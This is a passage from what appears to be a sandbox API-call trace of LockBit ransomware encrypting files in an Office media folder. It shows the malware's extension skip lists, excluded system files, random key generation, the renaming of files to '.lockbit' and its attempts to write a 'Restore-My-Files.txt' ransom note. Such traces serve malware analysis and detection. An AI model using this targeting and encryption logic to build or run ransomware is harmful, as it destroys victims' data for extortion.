returned -1 [0199.720] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0199.720] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0199.720] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0199.720] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.720] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0199.720] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0199.720] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0199.720] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0199.720] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18184_.WMF") returned 1 [0199.720] lstrcmpiW (lpString1="ntldr", lpString2="BD18184_.WMF") returned 1 [0199.720] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18184_.WMF") returned 1 [0199.720] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18184_.WMF") returned 1 [0199.720] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18184_.WMF") returned -1 [0199.720] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18184_.WMF") returned 1 [0199.720] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18184_.WMF") returned 1 [0199.720] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0199.720] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18184_.WMF") returned=".WMF" [0199.720] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.720] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.720] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0199.720] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0199.720] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0199.720] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0199.720] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0199.720] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0199.720] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0199.720] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.720] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0199.721] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0199.721] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0199.721] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0199.721] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0199.721] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0199.721] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0199.721] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0199.721] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0199.721] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0199.721] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0199.721] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0199.721] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0199.721] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0199.721] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0199.721] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0199.721] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0199.721] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0199.721] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18184_.WMF.lockbit") returned 79 [0199.721] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18184_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18184_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0199.722] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0199.723] malloc (_Size=0x40068) returned 0x1ff1e60 [0199.723] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=3362) returned 1 [0199.723] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.723] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.723] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0199.723] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.723] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.723] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0199.723] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0199.727] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18184_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18184_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.727] malloc (_Size=0xb4) returned 0x1fa2ed8 [0199.727] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0199.728] free (_Block=0x1fa2ed8) [0199.728] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18184_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0199.728] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0199.728] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0199.728] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd8867900, ftCreationTime.dwHighDateTime=0x1bdcf1b, ftLastAccessTime.dwLowDateTime=0xbcb67640, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xd8867900, ftLastWriteTime.dwHighDateTime=0x1bdcf1b, nFileSizeHigh=0x0, nFileSizeLow=0xd42, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18185_.WMF", cAlternateFileName="")) returned 1 [0199.729] lstrcmpiW (lpString1=".", lpString2="BD18185_.WMF") returned -1 [0199.729] lstrcmpiW (lpString1="..", lpString2="BD18185_.WMF") returned -1 [0199.729] PathFindExtensionW (pszPath="BD18185_.WMF") returned=".WMF" [0199.729] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0199.729] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0199.729] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0199.729] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0199.729] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0199.729] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0199.729] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0199.729] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0199.729] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0199.729] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0199.729] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0199.729] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0199.729] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0199.729] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0199.729] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0199.729] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0199.729] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0199.729] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0199.729] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0199.729] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0199.729] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0199.729] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0199.729] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0199.729] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0199.729] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.730] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0199.730] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0199.730] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0199.730] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0199.730] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0199.730] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0199.730] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0199.730] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0199.730] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0199.730] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0199.730] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0199.730] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0199.730] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0199.730] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0199.730] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0199.730] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0199.730] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0199.730] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.730] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0199.730] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0199.730] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0199.730] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0199.730] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18185_.WMF") returned 1 [0199.730] lstrcmpiW (lpString1="ntldr", lpString2="BD18185_.WMF") returned 1 [0199.730] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18185_.WMF") returned 1 [0199.730] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18185_.WMF") returned 1 [0199.730] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18185_.WMF") returned -1 [0199.731] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18185_.WMF") returned 1 [0199.731] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18185_.WMF") returned 1 [0199.731] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0199.731] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18185_.WMF") returned=".WMF" [0199.731] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.731] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.731] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0199.731] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0199.731] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0199.731] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0199.731] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0199.731] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0199.731] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0199.731] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.731] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0199.731] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0199.731] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0199.731] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0199.731] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0199.731] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0199.731] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0199.731] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0199.731] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0199.731] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0199.731] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0199.731] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0199.731] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0199.731] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0199.731] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0199.732] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0199.732] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0199.732] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0199.732] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18185_.WMF.lockbit") returned 79 [0199.732] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18185_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18185_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0199.733] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0199.733] malloc (_Size=0x40068) returned 0x3d70450 [0199.733] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=3394) returned 1 [0199.733] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.734] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.734] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0199.734] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.734] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.734] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0199.734] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0199.737] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18185_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18185_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.737] malloc (_Size=0xb4) returned 0x1fa2ed8 [0199.737] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0199.739] free (_Block=0x1fa2ed8) [0199.739] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18185_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0199.739] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0199.739] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0199.739] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe50bd100, ftCreationTime.dwHighDateTime=0x1bdcf1d, ftLastAccessTime.dwLowDateTime=0xbcb67640, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe50bd100, ftLastWriteTime.dwHighDateTime=0x1bdcf1d, nFileSizeHigh=0x0, nFileSizeLow=0x758, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18187_.WMF", cAlternateFileName="")) returned 1 [0199.739] lstrcmpiW (lpString1=".", lpString2="BD18187_.WMF") returned -1 [0199.739] lstrcmpiW (lpString1="..", lpString2="BD18187_.WMF") returned -1 [0199.739] PathFindExtensionW (pszPath="BD18187_.WMF") returned=".WMF" [0199.739] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0199.740] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0199.740] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0199.740] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0199.740] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0199.740] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0199.740] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0199.740] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0199.740] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0199.740] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0199.740] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0199.740] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0199.740] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0199.740] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0199.740] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0199.740] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0199.740] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0199.740] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0199.740] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0199.740] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0199.740] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0199.740] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0199.740] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0199.740] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0199.740] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.740] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0199.741] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0199.741] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0199.741] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0199.741] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0199.741] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0199.741] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0199.741] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0199.741] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0199.741] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0199.741] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0199.741] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0199.741] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0199.741] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0199.741] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0199.741] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0199.741] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0199.741] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.741] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0199.741] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0199.741] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0199.741] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0199.741] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18187_.WMF") returned 1 [0199.741] lstrcmpiW (lpString1="ntldr", lpString2="BD18187_.WMF") returned 1 [0199.741] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18187_.WMF") returned 1 [0199.741] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18187_.WMF") returned 1 [0199.741] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18187_.WMF") returned -1 [0199.741] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18187_.WMF") returned 1 [0199.742] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18187_.WMF") returned 1 [0199.742] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0199.742] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18187_.WMF") returned=".WMF" [0199.742] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.742] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.742] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0199.742] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0199.742] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0199.742] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0199.742] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0199.742] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0199.742] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0199.742] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.742] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0199.742] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0199.742] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0199.742] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0199.742] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0199.742] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0199.742] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0199.742] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0199.742] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0199.742] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0199.742] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0199.742] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0199.743] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0199.743] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0199.743] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0199.743] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0199.743] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0199.743] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0199.743] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18187_.WMF.lockbit") returned 79 [0199.743] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18187_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18187_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0199.747] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0199.747] malloc (_Size=0x40068) returned 0x3df0008 [0199.747] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=1880) returned 1 [0199.747] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.748] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.748] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0199.748] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.748] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.748] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0199.748] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0199.750] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18187_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18187_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.750] malloc (_Size=0xb4) returned 0x1fa2ed8 [0199.750] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6aa8c, 